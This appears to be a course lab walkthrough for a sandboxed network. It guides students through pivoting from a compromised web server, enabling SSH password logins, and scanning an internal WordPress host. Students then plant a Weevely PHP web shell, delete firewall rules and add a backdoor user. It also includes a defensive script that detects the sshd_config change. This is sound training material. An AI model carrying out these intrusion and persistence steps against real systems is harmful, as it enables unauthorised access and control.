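Pre-existing accounts such as StudentFirst are ignored even when they log in, because the check keys on the creation event; in practice the same logic would run over a rolling window, with the baseline list of expected accounts excluded.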
Now that you have a user account that you have full control over on the compromised system, you will use that system to
pivot to the next part of the network. The term pivoting describes the act of leapfrogging from one host to
another. Hackers use pivoting to gain access to network segments when normal access is not allowed. To do this, you will use
SSH to create a SOCKS connection to the web server. The SOCKS protocol allows a client to make network connections, and
exchange network packets between a client and a server, through a proxy.
The following will guide you through the steps of creating this connection:
You will now create a SOCKS proxy connection to the webserver using port 3434 on the NIXTGT01 VM (192.168.10.111).
As you can see, the SSH connection attempt to the webserver failed due to a permission denial error related to an
unrecognized certificate. To bypass this requirement, you need to make configuration changes to the sshd_config file on the
target webserver. In order to do this, you will download a copy of the sshd_config file, edit it, and overwrite the original on the
webserver.
Step 3 – Downloading and Modifying sshd_config file from the compromised system (First webserver)
a. Now, go back to the terminal window with the Meterpreter session to the first web server.
Note: You will use Meterpreter to download a copy of the “sshd_config” file to be edited using the Meterpreter session.
exit
This will take you out of the shell session and back into the meterpreter session as shown below.
c. Download a copy of the sshd_config file within the Meterpreter session by entering the following command:
Note: While the download is in progress, the Meterpreter session will display “downloading:” followed by the file source and
destination paths (the download may take longer depending on the file size); when it completes, it will display “download:”
followed by the source and destination paths.
After a successful download, a copy of the “sshd_config” file will be placed on the Desktop of the NIXATK01 VM, as specified
by the destination path provided in the command.
Notice that the downloaded copy of the “sshd_config” file is locked and has “Read only” permissions for everyone. In order to
edit and upload a copy of this file to the compromised webserver, you need to create an editable copy and save it with the
original file name.
e. Now, create a copy of the “sshd_config_original” file on the Desktop and rename it “sshd_config” (Right click on
sshd_config_original, then select copy, then paste the file on the desktop, then select the pasted file and rename it to
sshd_config).
f. Then, right-click on the “sshd_config” file and then select “Open with Leafpad.”
g. After the file is opened, look for the line “#PasswordAuthentication Yes” and remove the “#” sign.
h. Then, look for the line “PasswordAuthentication No” and add the “#” sign in front of it.
Note: The “#” sign is used to comment out lines in the configuration file; sshd ignores a commented line. In other words, the “#” sign is used to
turn parts of the configuration file on or off.
j. After the three changes have been made, save the “sshd_config” file.
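To see exactly what the two comment-marker edits change, the following Python script, added here as an example and not part of the original lab, computes the values sshd would actually use from a config file and reports when an edit turns password authentication on. The two config snippets are constructed. The parsing rule follows sshd_config(5): for each keyword the first obtained value is used, lines beginning with “#” are comments, keywords are case-insensitive, and a Match line starts a conditional section that no longer applies globally.

```python
"""Effective-value parser for sshd_config plus a before/after audit check.
Added example for this lab (not from the original material); the two
config snippets are constructed samples."""
from typing import Dict, Optional

# Constructed sample resembling a stock Debian-style sshd_config stanza.
ORIGINAL = """\
# Authentication settings (constructed sample)
#PasswordAuthentication yes
PasswordAuthentication no
ChallengeResponseAuthentication no
UsePAM yes
"""

# The same file after the lab's edit: the two "#" markers were swapped.
MODIFIED = """\
# Authentication settings (constructed sample)
PasswordAuthentication yes
#PasswordAuthentication no
ChallengeResponseAuthentication no
UsePAM yes
"""


def effective_settings(config_text: str) -> Dict[str, str]:
    """Return the global keyword values sshd would actually use.
    Commented and blank lines are skipped, keywords are lower-cased, the
    first occurrence of a keyword wins (sshd_config semantics), and parsing
    stops at the first Match line because later lines are conditional."""
    settings: Dict[str, str] = {}
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                      # comment or blank line: ignored by sshd
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue                      # keyword without a value: skip
        key, value = parts[0].lower(), parts[1].strip()
        if key == "match":
            break                         # remaining lines are not global
        settings.setdefault(key, value)   # first obtained value is kept
    return settings


def password_auth_enabled(config_text: str) -> bool:
    """sshd treats a missing PasswordAuthentication keyword as 'yes'."""
    value = effective_settings(config_text).get("passwordauthentication", "yes")
    return value.lower() == "yes"


def audit_change(before: str, after: str) -> Optional[str]:
    """One-line finding when an edit turns password logins on; None otherwise."""
    if not password_auth_enabled(before) and password_auth_enabled(after):
        return ("PasswordAuthentication changed from no to yes: "
                "password logins are now accepted")
    return None


if __name__ == "__main__":
    print("before:", effective_settings(ORIGINAL))
    print("after: ", effective_settings(MODIFIED))
    print(audit_change(ORIGINAL, MODIFIED))
```

Because the first value wins, uncommenting the earlier “yes” line alone already flips the setting; commenting out the later “no” line only removes a duplicate that sshd would have ignored anyway. A file-integrity monitor on /etc/ssh/sshd_config, or a periodic comparison of effective_settings against a known-good baseline, catches this class of change regardless of which line was edited.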
Step 4 – Uploading the modified sshd_config file back to the compromised system.
a. Go back to the terminal window with the Meterpreter session and type the following command to upload the sshd_config
file to the “tmp” directory of the webserver.
Note:
1- Uploading to the “tmp” directory of the webserver first facilitates the overwriting of the original “sshd_config” file on
the compromised webserver.
2- Make sure that the meterpreter session is still alive before entering the following command. If the session is closed for
any reason, you must go back to Step 5 (f) of Part 3 and reestablish the session.
In order to copy the modified “sshd_config” file and override the original file on the webserver, we need to drop back into a
shell within the Meterpreter session to execute the copy command.
b. In the shell, override the original “sshd_config” file on the webserver using the following copy command:
c. While in the shell, stop and then start the sshd service by entering the following command:
d. Open a new terminal window and enter the following command to create the socks proxy.
Note: When prompted, first, enter the password for the “StudentFirst” account, “Cyb3rl@b”. Then, enter the password for
“bob”, “bobpass”.
Note: After the SSH session has been successfully established, you should see the command prompt change from
“StudentFirst@cst630-nixatk01:~$” to “[bob@cst630-nixtgt01 ~]$”.
Unlike in the first attempt, now that the configuration has been changed and forced to be accepted, the user bob is
allowed access via SSH.
Part 5 - Scanning the second webserver (hr.acme.com) with the dirb and wpscan tools.
Because your a"acker VM, NIXATK01, does not have direct access to the second webserver, hr.acme.com, you will employ
pivo!ng techniques by leveraging the already established SSH connec!on to the first webserver to run dirb scans against the
second webserver, which is also on that same network.
Note: You will set up a SOCKS proxy over the SSH tunnel connection to the first webserver on the localhost, 127.0.0.1, with
source port 3434.
The dirb scan has identified that the internal webserver (2nd webserver) is also a WordPress server. Run a wpscan of the
internal webserver by entering the following command in the terminal:
Answer the following questions and include your answers in your final report:
3. Do you see any vulnerabilities that allow remote code execution or arbitrary file upload? Are there any other red alerts?
a. Open the Mozilla Firefox web browser (click on Applications, then Web Browser) provided within the distribution of Kali
Linux that you are currently using in this exercise.
b. Go to the settings of the browser and open the network configuration settings by following the steps below.
After the browser is open, click on the “Burger” icon near the top right corner of the browser window to display
the browser menu.
Then, click on the Advanced button on the left side of the screen.
Finally, click on “Network”, then “Settings” to display the Connection Settings to be edited.
Select Manual proxy configuration (see below). Enter the values of the “HTTP Proxy” and “Port” and then click OK.
a. Minimize all open windows and launch Burp Suite. The Burp Suite application can be launched from the “Applications”
menu, under the “Web Application Analysis” submenu.
h. In the SOCKS Proxy section of the “User options” tab, set the following values:
Note: You might need to first type in the SOCKS proxy host and the SOCKS proxy port before being able to select “Use
SOCKS proxy”. Please make sure that this option is selected before moving forward.
i. Within Burp Suite, also disable packet interception by going to the Proxy tab and toggling the intercept
button to off.
Step 3 – Editing the “proxychains.conf” configuration file using the VI text editor
Now, you will use the first web server to force the connection used by the next exploit. Open a new terminal and type the
following command.
a. Open the “proxychains.conf” file using the VI text editor (a user guide for VI is at the following link:
https://www.howtogeek.com/102468/a-beginners-guide-to-editing-text-files-with-vi/
(http://www.howtogeek.com/102468/a-beginners-guide-to-editing-text-files-with-vi/)) with the following command:
$ sudo vi /etc/proxychains.conf
Note: If prompted, please provide the password, Cyb3rl@b, for the StudentFirst account.
b. Scroll to the bottom of the configuration file and press the letter “i” on your keyboard to put vi in editing mode.
Before continuing, comment out the following line by adding a “#” in front of it. This renders that line of the configuration
inactive (i.e. this replaces the “socks4 127.0.0.1 9050” line with “socks5 127.0.0.1 3434”).
d. When you are done editing, press the escape key, “Esc”.
e. Type the following command and hit “Enter” to save the configuration file and quit the vi application:
:wq
Now that the ProxyChain is set, you’ll use Weevely to build a new payload.
a. In the terminal, use the following command to generate a new payload called “wee.php” on the Desktop and assign it the
password “pass” (enter the password for StudentFirst (Cyb3rl@b) if you are prompted to).
Note: For this step to be completed successfully you must have the SSH connection to the first webserver (192.168.10.111)
active using bob’s account. If the SSH connection is not active, open a terminal window and reestablish it using the following command:
Note: When prompted, first, enter the password for the “StudentFirst” account, “Cyb3rl@b”. Then, enter the password for “bob”,
“bobpass”.
a. From the desktop of your NIXATK01 VM, double click and open the “Lab Resources” folder.
c. Click on the “Download Project resources” shortcut to get to the “CST630Project Resources” page.
Note: When the file is uploaded, you will see {"success": true,"fileName":"\/\/\/wee.php"} on the web page. This means
that the file was successfully uploaded to the web server.
After the file is uploaded, make sure you can see it within the directory listing on the web server.
a. Browse to the upload directory by using the following URL from your NIXATK01 VM: hr.acme.com/wordpress/wp-content/uploads
a. Open a terminal and enter the following command (Enter the password for StudentFirst (Cyb3rl@b) if you are prompted
to):
After you enter this command, you will see the following screen:
b. At this point, you will need to enter Linux-based commands to interact with the system. In the terminal, you may try the
following commands:
Weevely> help
Weevely> uname
Weevely> system_info
Weevely> audit_phpconf
Weevely> audit_etcpasswd
In the previous step, you successfully established a backdoor connection to the second webserver using pivoting techniques
by taking advantage of your initial SSH connection to the first webserver. However, you will have issues connecting directly to
the second webserver due to routing restrictions. As a result, you need to remove the routing restrictions to allow you to
SSH directly to the host.
a. Type the following command to list the iptables rules (enter the password for StudentFirst (Cyb3rl@b) if you are prompted to):
b. Delete the REJECT restriction for the Kali host using the following command (enter the password for StudentFirst
(Cyb3rl@b) if you are prompted to).
a. Add a user to the system. Enter the following command (Enter the password for StudentFirst (Cyb3rl@b) if you are
prompted to).
b. Change alice’s password using the following command (enter the password for StudentFirst (Cyb3rl@b) if you are prompted
to):
Now, remove the proxy setup from the browser by reversing the steps you did earlier in Part 6.
As with the first webserver, in order to successfully establish an SSH connection, you need to edit the “sshd_config” file and
overwrite the original file on the webserver. However, you have already edited the file and kept a copy on the desktop of your
NIXATK01 Kali VM. Hence, all you need to do at this point is to overwrite the server’s original copy of the file. The following
steps will help you accomplish this goal.
a. Upload the edited copy of the “sshd_config” file to the “tmp” directory on the second webserver
b. Overwrite the “sshd_config” file on the webserver (enter the password for StudentFirst (Cyb3rl@b) if you are prompted
to):
c. Restart the sshd service. Enter the following command (enter the password for StudentFirst (Cyb3rl@b) if you are
prompted to):
d. Open a new terminal and type the following command to SSH back to the host (second webserver) (enter the password
for StudentFirst (Cyb3rl@b) if you are prompted to).
- Open a new terminal (on NIXATK01) and run the following command (enter the password for StudentFirst (Cyb3rl@b) if you
are prompted to):
Note: You will see some new output when running this command. That output will look like the top part of the screen below.
This shows how ProxyChains is building the connections. This command will take time to run.
Note: Now that you have access to the two systems in the network, see if you can get root on either host.
Congratulations! You have now reached the end of the lab! Close all applications and exit the virtual lab, and ensure that you
compile your findings in your lab report for submission.